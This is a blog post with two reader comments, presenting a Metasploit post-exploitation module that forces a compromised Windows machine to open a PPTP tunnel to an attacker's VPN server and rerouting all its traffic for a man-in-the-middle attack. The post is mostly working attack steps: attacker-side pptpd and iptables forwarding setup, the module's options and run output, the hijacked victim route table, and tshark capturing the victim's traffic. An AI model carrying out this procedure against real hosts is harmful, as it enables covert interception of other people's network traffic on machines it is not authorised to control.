Pages

Wednesday, June 19, 2013

Metasploit: Man in the Middle through PPTP tunnel

Recently I made a small post-exploitation module to take advantage of the rasdial Windows client. The idea is to create an outbound VPN connection (pptp) from the "victim" machine to a VPN server configured in the "attacker" machine. Once the  pptp tunnel is created we can forward all victim traffic through the tunnel getting a man-in-the-middle attack. 

To get this we have to create a temporal .pbk (phonebook file) with certain parameters and force the rasdial client to use that file. The most important parameter to get the MITM is IpPrioritizeRemote. This option allows rasdial to set a new default route pointing to the new VPN peer IP of the attacker host. This new default GW will have a better metric to the default one so this way we will get that all outbound traffic to internet or to an unknown network will go through our machine. Obviously we need to configure forwarding and masquerading to get a real MITM, which can be easily done with IPTABLES. To make the tests I have used the pptpd package as VPN server from Debian.  The simplest configuration is:


ATTACKER MACHINE

root@Mordor:~# tail -2 /etc/pptpd.conf
localip 192.168.0.1
remoteip 192.168.0.234-238

root@Mordor:~# tail -1 /etc/ppp/chap-secrets
msf * m3taSpl01t *

root@Mordor:~# /etc/init.d/pptpd restart && netstat -putan | grep 1723
Restarting PPTP: 
Stopping PPTP: pptpd.
Starting PPTP Daemon: pptpd.
tcp        0      0 0.0.0.0:1723            0.0.0.0:*               LISTEN      22027/pptpd 

root@Mordor:~# iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
root@Mordor:~# iptables -A FORWARD -i ppp0 -o wlan0 -j ACCEPT
root@Mordor:~# iptables -A FORWARD -i wlan0 -o ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
root@Mordor:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@Mordor:~# ifconfig wlan0 | grep 82
          inet addr:192.168.1.82  Bcast:192.168.1.255  Mask:255.255.255.0

root@Mordor:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.0     0.0.0.0            255.255.255.0   U      0     0       0 wlan0
0.0.0.0            192.168.1.1     0.0.0.0               UG   0      0      0 wlan0

VICTIM MACHINE

C:\Documents and Settings\Peregrino>ipconfig

Configuración IP de Windows

Adaptador Ethernet Conexiones de red inalámbricas          :

        Sufijo de conexión específica DNS :
        Dirección IP. . . . . . . . . . . :                   192.168.1.131
        Máscara de subred . . . . . . . . :            255.255.255.0
        Puerta de enlace predeterminada   :      192.168.1.1

C:\Documents and Settings\Peregrino>route PRINT
===========================================================================

Rutas activas:
Destino de red        Máscara de red   Puerta de acceso       Interfaz       Métrica
                0.0.0.0                      0.0.0.0       192.168.1.1       192.168.1.131         25
            127.0.0.0                 255.0.0.0           127.0.0.1                127.0.0.1           1
        192.168.1.0       255.255.255.0   192.168.1.131       192.168.1.131         25
    192.168.1.131  255.255.255.255            127.0.0.1                127.0.0.1         25
    192.168.1.255  255.255.255.255   192.168.1.131       192.168.1.131         25
...

PPTP uses a TCP port as control channel and GRE to send encapsulated data so port 53 and 1723 must be reachable. Take this into account if you use it over WAN.

With this configuration you only need to run the module with the previous parameters (username and password):

msf post(pptp_tunnel) > set PASSWORD M3taSpl01t
PASSWORD => M3taSpl01t
msf post(pptp_tunnel) > set USERNAME bmerino
USERNAME => bmerino
msf post(pptp_tunnel) > set RHOST 192.168.1.82
RHOST => 192.168.1.82
msf post(pptp_tunnel) > set session 1
session => 1
msf post(pptp_tunnel) > run

[+] PhoneBook configuration written to C:\DOCUME~1\PEREGR~1\CONFIG~1\Temp\UotYzylPVA.pbk
[*] 60
[*] Establishing connection ...
[+] Connection Successful
[*] Phonebook deleted
[*] Post module execution completed

Once the tunnel has been created we can see the new interface in our evil host:

root@Mordor:~# ifconfig ppp0 | grep Link -A 1
ppp0      Link encap:Point-to-Point Protocol  
              inet addr:192.168.0.1  P-t-P:192.168.0.234  Mask:255.255.255.255


And we can see the new interface and the new route in the victim machine:

C:\Documents and Settings\Peregrino>ipconfig

Configuración IP de Windows

Adaptador Ethernet Conexiones de red inalámbricas          :

        Sufijo de conexión específica DNS :
        Dirección IP. . . . . . . . . . . :                    192.168.1.131
        Máscara de subred . . . . . . . . :            255.255.255.0
        Puerta de enlace predeterminada   :      192.168.1.1

Adaptador PPP {34B7C931-D079-4817-8B5D-93A3C8CE6890}               :

        Sufijo de conexión específica DNS :
        Dirección IP. . . . . . . . . . . :                        192.168.0.234
        Máscara de subred . . . . . . . . :            255.255.255.255
        Puerta de enlace predeterminada   :      192.168.0.234

C:\Documents and Settings\Peregrino>route PRINT
===========================================================================

Rutas activas:
Destino de red           Máscara de red   Puerta de acceso         Interfaz          Métrica
           0.0.0.0               0.0.0.0      192.168.0.234     192.168.0.234    1
               0.0.0.0                    0.0.0.0                192.168.1.1      192.168.1.131       26
           127.0.0.0                255.0.0.0                    127.0.0.1              127.0.0.1         1
    192.168.0.234   255.255.255.255                  127.0.0.1             127.0.0.1        50
    192.168.0.255   255.255.255.255         192.168.0.234     192.168.0.234       50
        192.168.1.0       255.255.255.0          192.168.1.131      192.168.1.131      25
      192.168.1.82   255.255.255.255         192.168.1.131      192.168.1.131      25
...
...

The new default route has a metric of 1 and is pointing to the recently VPN interface. Now, if we leave tshark running in our wlan0 interface we could see all the outbound traffic of that host:

C:\Documents and Settings\Peregrino>ping www.metasploit.com

Haciendo ping a www.metasploit.com [208.118.237.137] con 32 bytes de datos:
Respuesta desde 208.118.237.137: bytes=32 tiempo=171ms TTL=47
Respuesta desde 208.118.237.137: bytes=32 tiempo=175ms TTL=47
...
root@Mordor:~# tshark -i wlan0 -R icmp
Capturing on wlan0
  8.833077 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
  8.993497 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
  9.837086 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
  9.999374 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
 10.837070 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
 10.992455 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply

Here I leave a How-to video:

2 comments:

  1. is it possible to implement this method trought a reverse_https or firewall???

    ReplyDelete
  2. this method is fantastic ... :-)

    ReplyDelete